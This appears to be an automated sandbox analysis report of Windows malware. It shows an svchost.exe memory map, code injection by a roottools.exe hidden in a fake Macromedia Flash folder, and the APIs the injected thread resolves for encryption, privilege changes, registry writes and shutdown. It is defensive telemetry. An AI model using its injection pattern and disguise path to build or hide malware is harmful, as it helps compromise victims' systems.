private_0x0000000000010000 0x00010000 0x0002ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000010000 0x00010000 0x0001ffff Pagefile Backed Memory Readable, Writable True False False
imm32.dll 0x00020000 0x0003dfff Memory Mapped File Readable False False False
pagefile_0x0000000000020000 0x00020000 0x00026fff Pagefile Backed Memory Readable True False False
private_0x0000000000030000 0x00030000 0x00031fff Private Memory Readable, Writable True False False
pagefile_0x0000000000030000 0x00030000 0x00031fff Pagefile Backed Memory Readable, Writable True False False
apisetschema.dll 0x00040000 0x00040fff Memory Mapped File Readable, Writable, Executable False False False
pagefile_0x0000000000050000 0x00050000 0x00053fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000060000 0x00060000 0x00060fff Pagefile Backed Memory Readable True False False
private_0x0000000000070000 0x00070000 0x0008bfff Private Memory Readable, Writable, Executable True False False
private_0x0000000000090000 0x00090000 0x000cffff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0009bfff Private Memory Readable, Writable True False False
private_0x0000000000090000 0x00090000 0x0009afff Private Memory Readable, Writable True False False
private_0x00000000000d0000 0x000d0000 0x000d0fff Private Memory Readable, Writable True False False
private_0x00000000000e0000 0x000e0000 0x000e0fff Private Memory Readable, Writable True False False
rsaenh.dll 0x000f0000 0x0012bfff Memory Mapped File Readable False False False
private_0x00000000000f0000 0x000f0000 0x0012ffff Private Memory Readable, Writable True False False
private_0x0000000000130000 0x00130000 0x0016ffff Private Memory Readable, Writable True False False
private_0x0000000000170000 0x00170000 0x001affff Private Memory Readable, Writable True False False
locale.nls 0x001b0000 0x00216fff Memory Mapped File Readable False False False
private_0x0000000000240000 0x00240000 0x0027ffff Private Memory Readable, Writable True False False
private_0x00000000002c0000 0x002c0000 0x002fffff Private Memory Readable, Writable True False False
private_0x0000000000330000 0x00330000 0x0036ffff Private Memory Readable, Writable True False False
private_0x0000000000380000 0x00380000 0x0038ffff Private Memory Readable, Writable True False False
private_0x00000000003a0000 0x003a0000 0x003dffff Private Memory Readable, Writable True False False
private_0x0000000000400000 0x00400000 0x0047ffff Private Memory Readable, Writable True False False
svchost.exe 0x004a0000 0x004a7fff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000004f0000 0x004f0000 0x0052ffff Private Memory Readable, Writable True False False
private_0x0000000000550000 0x00550000 0x0058ffff Private Memory Readable, Writable True False False
private_0x00000000005d0000 0x005d0000 0x0060ffff Private Memory Readable, Writable True False False
private_0x0000000000630000 0x00630000 0x0072ffff Private Memory Readable, Writable True False False
pagefile_0x0000000000730000 0x00730000 0x008b7fff Pagefile Backed Memory Readable True False False
pagefile_0x00000000008c0000 0x008c0000 0x00a40fff Pagefile Backed Memory Readable True False False
pagefile_0x0000000000a50000 0x00a50000 0x01e4ffff Pagefile Backed Memory Readable True False False
pagefile_0x0000000001e50000 0x01e50000 0x02242fff Pagefile Backed Memory Readable True False False
private_0x0000000002250000 0x02250000 0x0245ffff Private Memory Readable, Writable True False False
private_0x0000000002260000 0x02260000 0x0229ffff Private Memory Readable, Writable True False False
private_0x00000000022b0000 0x022b0000 0x022effff Private Memory Readable, Writable True False False
private_0x0000000002350000 0x02350000 0x0238ffff Private Memory Readable, Writable True False False
private_0x00000000023a0000 0x023a0000 0x023dffff Private Memory Readable, Writable True False False
private_0x00000000023e0000 0x023e0000 0x0245ffff Private Memory Readable, Writable True False False
sortdefault.nls 0x02460000 0x0272efff Memory Mapped File Readable False False False
private_0x0000000002760000 0x02760000 0x0279ffff Private Memory Readable, Writable True False False
private_0x00000000027d0000 0x027d0000 0x0280ffff Private Memory Readable, Writable True False False
private_0x0000000002870000 0x02870000 0x028affff Private Memory Readable, Writable True False False
private_0x00000000028c0000 0x028c0000 0x028fffff Private Memory Readable, Writable True False False
private_0x0000000002900000 0x02900000 0x029fffff Private Memory Readable, Writable True False False
private_0x0000000002a70000 0x02a70000 0x02aaffff Private Memory Readable, Writable True False False
private_0x0000000002b00000 0x02b00000 0x02b3ffff Private Memory Readable, Writable True False False
private_0x0000000002b70000 0x02b70000 0x02baffff Private Memory Readable, Writable True False False
wow64cpu.dll 0x743d0000 0x743d7fff Memory Mapped File Readable, Writable, Executable False False False
wow64win.dll 0x743e0000 0x7443bfff Memory Mapped File Readable, Writable, Executable False False False
wow64.dll 0x74440000 0x7447efff Memory Mapped File Readable, Writable, Executable False False False
rsaenh.dll 0x75630000 0x7566afff Memory Mapped File Readable, Writable, Executable False False False
cryptsp.dll 0x75670000 0x75685fff Memory Mapped File Readable, Writable, Executable False False False
secur32.dll 0x75690000 0x75697fff Memory Mapped File Readable, Writable, Executable False False False
cryptbase.dll 0x75800000 0x7580bfff Memory Mapped File Readable, Writable, Executable False False False
sspicli.dll 0x75810000 0x7586ffff Memory Mapped File Readable, Writable, Executable False False False
user32.dll 0x758c0000 0x759bffff Memory Mapped File Readable, Writable, Executable False False False
kernel32.dll 0x759c0000 0x75acffff Memory Mapped File Readable, Writable, Executable False False False
psapi.dll 0x75ad0000 0x75ad4fff Memory Mapped File Readable, Writable, Executable False False False
ole32.dll 0x75ae0000 0x75c3bfff Memory Mapped File Readable, Writable, Executable False False False
iertutil.dll 0x75c40000 0x75e3afff Memory Mapped File Readable, Writable, Executable False False False
msvcrt.dll 0x75e70000 0x75f1bfff Memory Mapped File Readable, Writable, Executable False False False
wininet.dll 0x75f20000 0x76014fff Memory Mapped File Readable, Writable, Executable False False False
imm32.dll 0x760b0000 0x7610ffff Memory Mapped File Readable, Writable, Executable False False False
usp10.dll 0x76110000 0x761acfff Memory Mapped File Readable, Writable, Executable False False False
oleaut32.dll 0x761b0000 0x7623efff Memory Mapped File Readable, Writable, Executable False False False
crypt32.dll 0x76240000 0x7635cfff Memory Mapped File Readable, Writable, Executable False False False
msasn1.dll 0x76360000 0x7636bfff Memory Mapped File Readable, Writable, Executable False False False
shlwapi.dll 0x76370000 0x763c6fff Memory Mapped File Readable, Writable, Executable False False False
msctf.dll 0x76570000 0x7663bfff Memory Mapped File Readable, Writable, Executable False False False
kernelbase.dll 0x76640000 0x76685fff Memory Mapped File Readable, Writable, Executable False False False
urlmon.dll 0x76690000 0x767c5fff Memory Mapped File Readable, Writable, Executable False False False
sechost.dll 0x767d0000 0x767e8fff Memory Mapped File Readable, Writable, Executable False False False
rpcrt4.dll 0x76800000 0x768effff Memory Mapped File Readable, Writable, Executable False False False
lpk.dll 0x768f0000 0x768f9fff Memory Mapped File Readable, Writable, Executable False False False
gdi32.dll 0x76950000 0x769dffff Memory Mapped File Readable, Writable, Executable False False False
shell32.dll 0x76a70000 0x776b9fff Memory Mapped File Readable, Writable, Executable False False False
advapi32.dll 0x77740000 0x777dffff Memory Mapped File Readable, Writable, Executable False False False
private_0x00000000778b0000 0x778b0000 0x779a9fff Private Memory Readable, Writable, Executable True False False
private_0x00000000779b0000 0x779b0000 0x77acefff Private Memory Readable, Writable, Executable True False False
ntdll.dll 0x77ad0000 0x77c78fff Memory Mapped File Readable, Writable, Executable False False False
ntdll.dll 0x77cb0000 0x77e2ffff Memory Mapped File Readable, Writable, Executable False False False
private_0x000000007ef9b000 0x7ef9b000 0x7ef9dfff Private Memory Readable, Writable True False False
private_0x000000007ef9e000 0x7ef9e000 0x7efa0fff Private Memory Readable, Writable True False False
private_0x000000007efa1000 0x7efa1000 0x7efa3fff Private Memory Readable, Writable True False False
private_0x000000007efa4000 0x7efa4000 0x7efa6fff Private Memory Readable, Writable True False False
private_0x000000007efa7000 0x7efa7000 0x7efa9fff Private Memory Readable, Writable True False False
private_0x000000007efaa000 0x7efaa000 0x7efacfff Private Memory Readable, Writable True False False
private_0x000000007efad000 0x7efad000 0x7efaffff Private Memory Readable, Writable True False False
pagefile_0x000000007efb0000 0x7efb0000 0x7efd2fff Pagefile Backed Memory Readable True False False
private_0x000000007efd5000 0x7efd5000 0x7efd7fff Private Memory Readable, Writable True False False
private_0x000000007efd8000 0x7efd8000 0x7efdafff Private Memory Readable, Writable True False False
private_0x000000007efdb000 0x7efdb000 0x7efddfff Private Memory Readable, Writable True False False
private_0x000000007efde000 0x7efde000 0x7efdefff Private Memory Readable, Writable True False False
private_0x000000007efdf000 0x7efdf000 0x7efdffff Private Memory Readable, Writable True False False
private_0x000000007efe0000 0x7efe0000 0x7ffdffff Private Memory Readable True False False
pagefile_0x000000007efe0000 0x7efe0000 0x7f0dffff Pagefile Backed Memory Readable True False False
private_0x000000007f0e0000 0x7f0e0000 0x7ffdffff Private Memory Readable True False False
private_0x000000007ffe0000 0x7ffe0000 0x7ffeffff Private Memory Readable True False False
private_0x000000007fff0000 0x7fff0000 0x7fffffeffff Private Memory Readable True False False
Injection Information
+
Injection Type Source Process Source Os Thread ID Injection Info Success Count Logfile
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x70000, size = 114688 True 1
Fn
Data
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x876c4, size = 4 True 1
Fn
Data
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x877d0, size = 4 True 1
Fn
Data
Modify Memory #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x87d38, size = 4 True 1
Fn
Data
Create Remote Thread #22: c:\users\aetadzjz\appdata\roaming\macromedia\flash player\macromedia.com\support\flashplayer\sys\roottools.exe 0x7b4 address = 0x795bc True 1
Fn
Threads
Thread 0x610
(Host: 244, Network: 0)
+
Category Operation Information Success Count Logfile
Module Load module_name = KERNEL32.dll, base_address = 0x759c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = TerminateThread, address_out = 0x759d7a2f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryA, address_out = 0x759d49d7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteFileW, address_out = 0x759d89b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapReAlloc, address_out = 0x77cf1f6e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetNativeSystemInfo, address_out = 0x759e10b5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateThread, address_out = 0x759d34d5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapAlloc, address_out = 0x77cde026 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapDestroy, address_out = 0x759d35b7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAllocEx, address_out = 0x759ed9b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LocalFree, address_out = 0x759d2d3c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DeleteCriticalSection, address_out = 0x77ce45f5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetComputerNameW, address_out = 0x759ddd0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcessHeap, address_out = 0x759d14e9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SystemTimeToFileTime, address_out = 0x759d5a7e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GlobalMemoryStatusEx, address_out = 0x759fd4c4 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateProcessW, address_out = 0x759d103d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WideCharToMultiByte, address_out = 0x759d170d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedIncrement, address_out = 0x759d1400 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetSystemTime, address_out = 0x759d5a96 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFreeEx, address_out = 0x759ed9c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsBadReadPtr, address_out = 0x759fd075 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiW, address_out = 0x759ed5cd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenMutexW, address_out = 0x759d5151 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEndOfFile, address_out = 0x759ece2e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentThread, address_out = 0x759d17ec True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FlushFileBuffers, address_out = 0x759d469b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveVectoredExceptionHandler, address_out = 0x77d25f41 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcess, address_out = 0x759d1809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetErrorMode, address_out = 0x759d1b00 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVersionExW, address_out = 0x759d1ae5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DuplicateHandle, address_out = 0x759d1886 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleA, address_out = 0x759d1245 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = AddVectoredExceptionHandler, address_out = 0x77d2742b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExitProcess, address_out = 0x759d7a10 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetCurrentProcessId, address_out = 0x759d11f8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileW, address_out = 0x759f830d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = lstrcmpiA, address_out = 0x759d3e8e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsWow64Process, address_out = 0x759d195e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstChangeNotificationW, address_out = 0x759ed851 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextChangeNotification, address_out = 0x759f5c1e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = IsProcessInJob, address_out = 0x759fc7ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateRemoteThread, address_out = 0x75a5416b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateNamedPipeW, address_out = 0x75a5414b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = DisconnectNamedPipe, address_out = 0x75a541df True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ConnectNamedPipe, address_out = 0x75a540fb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLogicalDrives, address_out = 0x759d5371 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetDriveTypeW, address_out = 0x759d418b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetUserDefaultUILanguage, address_out = 0x759d44ab True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CopyFileExW, address_out = 0x759f3b92 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetEnvironmentVariableW, address_out = 0x759d1b48 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFilePointer, address_out = 0x759d17d1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InitializeCriticalSection, address_out = 0x77ce2c42 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTimeZoneInformation, address_out = 0x759d465a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = MultiByteToWideChar, address_out = 0x759d192e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileAttributesW, address_out = 0x759ed4f7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeNameForVolumeMountPointW, address_out = 0x759e052f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenProcess, address_out = 0x759d1986 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileTime, address_out = 0x759d4407 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReleaseMutex, address_out = 0x759d111e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LeaveCriticalSection, address_out = 0x77cd2270 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleFileNameW, address_out = 0x759d4950 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetFileTime, address_out = 0x759eecbb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = RemoveDirectoryW, address_out = 0x75a544cf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualAlloc, address_out = 0x759d1856 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ExpandEnvironmentStringsW, address_out = 0x759d4173 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteFile, address_out = 0x759d1282 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindNextFileW, address_out = 0x759d54ee True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = EnterCriticalSection, address_out = 0x77cd22b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileAttributesW, address_out = 0x759d1b18 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindClose, address_out = 0x759d4442 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = OpenEventW, address_out = 0x759d15d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTempPathW, address_out = 0x759ed4dc True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetLastError, address_out = 0x759d11a9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapFree, address_out = 0x759d14c9 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = HeapCreate, address_out = 0x759d4a2d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WriteProcessMemory, address_out = 0x759ed9e0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetFileSizeEx, address_out = 0x759d59e2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FindFirstFileW, address_out = 0x759d4435 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = InterlockedExchange, address_out = 0x759d1462 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetVolumeInformationW, address_out = 0x759ec860 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ReadFile, address_out = 0x759d3ed3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateDirectoryW, address_out = 0x759d4259 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = FreeLibrary, address_out = 0x759d34c8 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetModuleHandleW, address_out = 0x759d34b0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetProcAddress, address_out = 0x759d1222 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = LoadLibraryW, address_out = 0x759d492b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32FirstW, address_out = 0x759f8baf True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Process32NextW, address_out = 0x759f896c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetLastError, address_out = 0x759d11c0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateToolhelp32Snapshot, address_out = 0x759f735f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateFileW, address_out = 0x759d3f5c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateMutexW, address_out = 0x759d424c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = ResetEvent, address_out = 0x759d16dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CloseHandle, address_out = 0x759d1410 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = SetEvent, address_out = 0x759d16c5 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = Sleep, address_out = 0x759d10ff True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = CreateEventW, address_out = 0x759d183e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForSingleObject, address_out = 0x759d1136 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = WaitForMultipleObjects, address_out = 0x759d4220 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = GetTickCount, address_out = 0x759d110c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\kernel32.dll, function = VirtualFree, address_out = 0x759d186e True 1
Fn
Module Load module_name = USER32.dll, base_address = 0x758c0000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetIconInfo, address_out = 0x758e49ea True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DrawIcon, address_out = 0x758e8deb True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = LoadImageW, address_out = 0x758dfbd1 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetCursorPos, address_out = 0x758e1218 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DefWindowProcW, address_out = 0x77ce25dd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CreateWindowExW, address_out = 0x758d8a29 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = UnregisterClassW, address_out = 0x758d9f84 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetKeyboardLayoutList, address_out = 0x758e2e69 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharLowerA, address_out = 0x758e3e75 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharToOemW, address_out = 0x75931a26 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = TranslateMessage, address_out = 0x758d7809 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = PeekMessageW, address_out = 0x758e05ba True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DispatchMessageW, address_out = 0x758d787b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = MsgWaitForMultipleObjects, address_out = 0x758e0b4a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = RegisterClassExW, address_out = 0x758db17d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = SetWindowLongA, address_out = 0x758e6110 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = GetWindowLongA, address_out = 0x758dd156 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = CharUpperW, address_out = 0x758df350 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\user32.dll, function = DestroyWindow, address_out = 0x758d9a55 True 1
Fn
Module Load module_name = CRYPT32.dll, base_address = 0x76240000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptImportPublicKeyInfo, address_out = 0x76256c0e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\crypt32.dll, function = CryptDecodeObjectEx, address_out = 0x7624d718 True 1
Fn
Module Load module_name = ADVAPI32.dll, base_address = 0x77740000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCloseKey, address_out = 0x7775469d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetAce, address_out = 0x777545f0 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptEncrypt, address_out = 0x7776779b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthorityCount, address_out = 0x77750e0c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AllocateAndInitializeSid, address_out = 0x777540e6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSidSubAuthority, address_out = 0x77750e24 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetEntriesInAclW, address_out = 0x77752a66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegCreateKeyExW, address_out = 0x777540fe True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptVerifySignatureW, address_out = 0x7774c54a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetNamedSecurityInfoW, address_out = 0x77749fe2 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetNamedSecurityInfoW, address_out = 0x7774f4fd True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptCreateHash, address_out = 0x7774df4e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptHashData, address_out = 0x7774df36 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorSacl, address_out = 0x77754680 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegSetValueExW, address_out = 0x777514d6 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyHash, address_out = 0x7774df66 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenProcessToken, address_out = 0x77754304 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = FreeSid, address_out = 0x7775412e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitializeSecurityDescriptor, address_out = 0x77754620 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegOpenKeyExW, address_out = 0x7775468d True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptImportKey, address_out = 0x7774c532 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = ConvertStringSecurityDescriptorToSecurityDescriptorW, address_out = 0x77751f59 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = OpenThreadToken, address_out = 0x7775432c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryValueExW, address_out = 0x777546ad True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptReleaseContext, address_out = 0x7774e124 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetTokenInformation, address_out = 0x7775431c True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptDestroyKey, address_out = 0x7774c51a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = AdjustTokenPrivileges, address_out = 0x7775418e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = SetSecurityDescriptorDacl, address_out = 0x7775415e True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetSecurityDescriptorSacl, address_out = 0x77754608 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = LookupPrivilegeValueW, address_out = 0x777541b3 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = GetLengthSid, address_out = 0x7775413b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegDeleteValueW, address_out = 0x7774cf31 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegFlushKey, address_out = 0x7776773f True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegNotifyChangeKeyValue, address_out = 0x7774e15b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegQueryInfoKeyW, address_out = 0x777546e7 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = RegEnumKeyW, address_out = 0x7775445b True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = InitiateSystemShutdownExW, address_out = 0x7779db3a True 1
Fn
Module Get Address module_name = c:\windows\syswow64\advapi32.dll, function = CryptAcquireContextW, address_out = 0x7774df14 True 1
Fn
Module Load module_name = SHELL32.dll, base_address = 0x76a70000 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteW, address_out = 0x76a83c71 True 1
Fn
Module Get Address module_name = c:\windows\syswow64\shell32.dll, function = ShellExecuteExW, address_out = 0x76a91e46 True 1
Fn
